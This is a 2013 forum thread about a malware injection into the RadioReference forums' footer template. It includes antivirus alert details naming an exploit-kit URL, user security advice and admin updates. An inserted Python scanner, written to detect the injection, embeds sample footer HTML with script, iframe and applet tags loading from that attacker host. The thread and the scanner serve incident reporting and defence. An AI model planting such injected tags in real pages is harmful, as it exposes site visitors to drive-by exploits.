Possible Virus on Forums


QDP2012

Member
Joined
Feb 8, 2012
Messages
1,921
Good evening Admins,

In case you would like to know...

When I visit the forums main page (forums.radioreference.com), and also when I then try to navigate to other sub-forums, and to individual threads, I am notified by Norton 360 of the following:

  • Severity: High
  • Message: An intrusion attempt by metripe.com was blocked.
  • IPS Alert Name: Web Attack: Sweet Orange Exploit Kit Website
  • Default Action: No Action Required
  • Action Taken: No Action Required
  • Attacking Computer: metripe.com (184.82.235.211, 80)
  • Attacker URL: metripe.com/custom/back.php?humor=1
  • Destination Address: (my computer's local private IP, port 1092)
  • Source Address: 184.82.235.211

More info:
  • OS: Win XP SP3 with current updates
  • Browser: IE8
  • Occurences: attack-blocked with every visit to any forum, any sub-forum, and any individual forum-page/thread.
  • First event at: 2013-11-09 / 23:51:09 EST
  • Most Recent at: (the time of this posting) (and each edit thereafter)
  • This attack happens:
    • (1) when navigating between forums, and
    • (2) when I "previewed" this message before posting it, and
    • (3) regardless of whether I am logged-into the forums, or just browsing them anonymously.
  • This attack does not happen when I visit other non-RR sites. It also does not happen when I visit the RRDB and the RR Wiki.

Hope this helps,

n5ims

Member
Joined
Jul 25, 2004
Messages
3,993
I'm also getting some popups that warn about an unsigned Java app from metripe.com that the forums are trying to run on my PC. Screenshots are attached to assist.

Attachments: Popup1.jpg, Popup2.jpg

kc4jgc

Member
Joined
Mar 7, 2004
Messages
1,546
Location
Virginia Beach, VA
Wirelessly posted (BlackBerry8320/4.5.0.81 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100)

Chrome is telling me that the forums "contain malware" and is blocked for now. I hope my BlackBerry isn't susceptible to this.

QDP2012

Member
Joined
Feb 8, 2012
Messages
1,921
Good job. Thanks!

Good job Admins. From here, it looks like the problem is resolved.

Thanks!

blantonl

Founder and CEO
Staff member
Super Moderator
Joined
Dec 9, 2000
Messages
11,115
Location
San Antonio, Whitefish, New Orleans
Hackers injected the malicious code into the footer template - we've restored from a backup and are doing further triage and work.

Google should remove the malware alerts here shortly.
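A check an admin could run over a restored footer template (or any rendered page) to catch the kind of injection described in the post above: it flags script, iframe, object, embed and applet references that point at hosts outside an allowlist. This is an added example, not the site's own tooling; the allowlist and the sample footer are constructed, and the only external URL it contains is the one Norton reported earlier in this thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample footer template. The external references reuse the
# attacker URL reported by Norton in this thread; everything else is invented.
SAMPLE_FOOTER = """
<div id="footer">
  <a href="/privacy.html">Privacy</a>
  <script src="/clientscript/vbulletin_global.js"></script>
  <script src="http://metripe.com/custom/back.php?humor=1"></script>
  <iframe src="//metripe.com/custom/back.php" width="1" height="1"></iframe>
  <applet code="x.class" archive="http://metripe.com/x.jar"></applet>
</div>
"""

# Hosts this site is allowed to load active content from (assumed allowlist).
ALLOWED_HOSTS = {"forums.radioreference.com", "www.radioreference.com"}

# Tag -> attributes that pull in executable or embedded content.
ACTIVE_ATTRS = {
    "script": ("src",),
    "iframe": ("src",),
    "object": ("data",),
    "embed": ("src",),
    "applet": ("code", "archive"),
}


class ActiveContentScanner(HTMLParser):
    """Collects (tag, attribute, url) for every off-site active-content reference."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        wanted = ACTIVE_ATTRS.get(tag)  # HTMLParser already lowercases tag names
        if not wanted:
            return
        for name, value in attrs:
            if name.lower() in wanted and value:
                # Relative paths have no hostname; "//host/..." and "http://host/..." do.
                host = urlparse(value).hostname
                if host and host.lower() not in self.allowed_hosts:
                    self.findings.append((tag, name.lower(), value))


def scan_template(html, allowed_hosts=ALLOWED_HOSTS):
    """Return all active-content references in `html` that load from a non-allowlisted host."""
    scanner = ActiveContentScanner(allowed_hosts)
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_template(SAMPLE_FOOTER):
        print("suspicious external reference:", finding)
```

Run against the live page as well as the stored template, since a compromised plugin or include can add the reference at render time even when the template file itself looks clean.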

blantonl

Founder and CEO
Staff member
Super Moderator
Joined
Dec 9, 2000
Messages
11,115
Location
San Antonio, Whitefish, New Orleans
Until Google implements a review and clears the alert, that is going to happen. Nothing we can do on our end except wait for the big black box to resolve that issue.

ind224

Member
Joined
Oct 30, 2004
Messages
761
Location
Indianapolis
Lindsay, do you approve of the tactics StopBadware / Google / whomever uses to block users from the site regardless of the issue? Isn't and hasn't malware and virus protection always been the end user's responsibility in the event something exactly like this happens?
Hopefully the offender AND StopBadware get a dose of Federal scrutiny. Hacking, including sending malicious code and DOS, is illegal as far as I have been told.
I posted yesterday, had no issues, and tried to see any updates on the thread this morning and was locked out. "Ignore the warning" sent me to the StopBadware page with no remedy. Now it allows me to come here, as it should have all along, IMO.

Search google for metripe. The results are hilarious if this is such a big vulnerability.

Ronaldski

MI DB Admin
Database Admin
Joined
Aug 23, 2005
Messages
2,984
Location
Bay City MI
From what Lindsay said, it's on Google's end, it looks like, possibly? I also run Norton Endpoint Protection but haven't seen any problems here at all.

Anything like that Adobe popup, it's ALWAYS the best thing to go to Adobe - Install Adobe Flash Player and download it from there. Those popups that say to install something are the primary way people get infected while searching the net.
Same goes for Java. Go to java.com for the true program. One just doesn't know where it will take you after you hit the OK button, as at that point you just gave them permission to do what they wanted! Apparently, the way you said it, rananthony04, it sounds like you are aware :)

Also be advised those antivirus programs are just your last chance to hopefully catch something. Your best antivirus is you!

I HIGHLY recommend using Download FileHippo Update Checker 1.040 - FileHippo.com at least weekly to update all the other software on your PC other than the Microsoft products, since non-Microsoft security holes are how they get through as well.

Leo Laporte's recommendations:
1. Don’t open email attachments; even if it’s from someone you know. If you do get something from someone you know, make sure that they really sent it to you. Email attachments are the number one way viruses and trojan horses get into your email. You might also want to turn off HTML email in Outlook and other programs. HTML emails are just as dangerous as rogue web sites, and can spread infections just by previewing them.

2. Don’t click links in email. That link could lead you to a phishing site, or the link may lead you to install malicious software. Copy and paste links into your browser, or type them in by hand instead. Another reason to disable HTML email - the HTML hides the real destination of that seemingly innocuous link.

3. Don’t download files from places you aren’t absolutely sure are safe. Stick with the well known sites. Teenagers who use filesharing software like BitTorrent, Azureus, Kazaa, Morpheus, Grokster, and Limewire, often unwittingly download spyware and trojans. If you must, quarantine all downloads then scan them a few days later with an updated anti-virus.

4. Update your OS regularly! Turn on automatic updates in OS X and Windows. Apply all critical updates immediately. Criminals often create hacks within 24 hours of Microsoft’s patches (these are called zero day exploits), so you need to protect yourself the day the patches appear.

5. Use a firewall. The best firewall is a hardware router - the kind you use to share an internet connection. Even if they’re not billed as firewalls, they are, and they’re quite effective. I also recommend turning on your operating system’s firewall - even if you have a router - but I don’t recommend third-party software firewalls. They cause more problems than they solve.

6. Never run as an administrator in any operating system. Administrators have way too many privileges that malicious people/code can take advantage of. Run as a limited user as much as possible. Windows Vista, Linux, and Mac OSX allow you to run a majority of features, but with some additional safety, as a limited user.
-- As far as tracking down hackers, regrettably it's all but useless. What they will do is use many infected personal computers and proxy sites to hack a site. That way it is very difficult to trace it back to the originator. Most hacks come from Russia or China.

SCPD

QRT
Joined
Feb 24, 2001
Messages
0
Location
Virginia
Looks like it may be time to upgrade to 4.x or even 5. vBulletin is known for vulnerabilities on the 3.8.x versions.

blantonl

Founder and CEO
Staff member
Super Moderator
Joined
Dec 9, 2000
Messages
11,115
Location
San Antonio, Whitefish, New Orleans
Looks like it may be time to upgrade to 4.x or even 5. vBulletin is known for vulnerabilities on the 3.8.x versions.

We are patched at a level where there are no known vulnerabilities. The attack vector was most likely a different piece of software that we run some of our trouble ticketing activities with.

We have no plans on upgrading to 4.x or 5.x.

SCPD

QRT
Joined
Feb 24, 2001
Messages
0
Location
Virginia
We are patched at a level where there are no known vulnerabilities. The attack vector was most likely a different piece of software that we run some of our trouble ticketing activities with.

We have no plans on upgrading to 4.x or 5.x.
Good to know. Thanks for your hard work!
Joined
Nov 29, 2004
Messages
182
Location
Ocean County, NJ
Thanks for the update Lindsay. I tried accessing the forum via Tapatalk, but I get a community not available (404) error. I don't know if you set it offline or if the repair kicked it offline.

deeridge

Member
Joined
Nov 8, 2013
Messages
10
I got the attack message this morning, cleared my cache and was able to view the forums for a while, but now the warning page appeared again. So I said I wanted to go there anyway. I'm new to the forums.